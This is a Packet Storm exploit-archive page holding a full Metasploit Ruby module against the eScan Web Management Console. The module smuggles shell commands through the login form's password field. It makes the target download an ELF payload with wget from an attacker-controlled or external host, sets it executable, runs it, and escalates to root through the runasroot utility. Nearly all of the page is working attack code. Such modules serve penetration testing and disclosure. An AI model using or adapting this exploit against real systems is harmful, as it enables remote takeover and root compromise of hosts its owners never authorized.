exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

eScan Web Management Console Command Injection

eScan Web Management Console Command Injection
Posted Apr 11, 2014
Authored by Joxean Koret, juan vazquez | Site metasploit.com

This Metasploit module exploits a command injection vulnerability found in the eScan Web Management Console. The vulnerability exists while processing CheckPass login requests. An attacker with a valid username can use a malformed password to execute arbitrary commands. With mwconf privileges, the runasroot utility can be abused to get root privileges. This Metasploit module has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.

tags | exploit, web, arbitrary, root
systems | linux, ubuntu
SHA-256 | be98f3a46fc9d7210a97e0f50b3bd1ba9ebef9cc6d3e9b5455d3e8e5c69531c0

eScan Web Management Console Command Injection

Change Mirror Download
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper

def initialize(info={})
super(update_info(info,
'Name' => "eScan Web Management Console Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in the eScan Web Management
Console. The vulnerability exists while processing CheckPass login requests. An attacker
with a valid username can use a malformed password to execute arbitrary commands. With
mwconf privileges, the runasroot utility can be abused to get root privileges. This module
has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Joxean Koret', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
],
'Payload' =>
{
'BadChars' => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
'DisableNops' => true
},
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
['eScan 5.5-2 / Linux', {}],
],
'DisclosureDate' => "Apr 04 2014",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(10080),
OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
], self.class)
end


def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path.to_s, 'index.php')
})

if res and res.code == 200 and res.body =~ /eScan WebAdmin/
return Exploit::CheckCode::Detected
end

Exploit::CheckCode::Unknown
end

def cmd_exec(session, cmd)
case session.type
when /meterpreter/
print_warning("#{peer} - Use a shell payload in order to get root!")
when /shell/
o = session.shell_command_token(cmd)
o.chomp! if o
end
return "" if o.nil?
return o
end

# Escalating privileges here because runasroot only can't be executed by
# mwconf uid (196).
def on_new_session(session)
cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
super
end

def primer
@payload_url = get_uri
wget_payload
end

def on_request_uri(cli, request)
print_status("Request: #{request.uri}")
if request.uri =~ /#{Regexp.escape(get_resource)}/
print_status("Sending payload...")
send_response(cli, @pl)
end
end

def exploit
@pl = generate_payload_exe
if @pl.blank?
fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
end
@payload_url = ""

if datastore['EXTURL'].blank?
begin
Timeout.timeout(datastore['HTTPDELAY']) {super}
rescue Timeout::Error
end
exec_payload
else
@payload_url = datastore['EXTURL']
wget_payload
exec_payload
end
end

# we execute in this way, instead of an ARCH_CMD
# payload because real badchars are: |&)(!><'"`[space]
def wget_payload
@dropped_elf = rand_text_alpha(rand(5) + 3)
command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"

print_status("#{peer} - Downloading the payload to the target machine...")
res = exec_command(command)
if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
else
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
end
end

def exec_payload
command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
command << File.join(datastore['WRITABLEDIR'], @dropped_elf)

print_status("#{peer} - Executing the payload...")
exec_command(command, 1)
end

def exec_command(command, timeout=20)
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s, 'login.php'),
'vars_post' => {
'uname' => datastore['USERNAME'],
'pass' => ";#{command}",
'product_name' => 'escan',
'language' => 'English',
'login' => 'Login'
}
}, timeout)
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close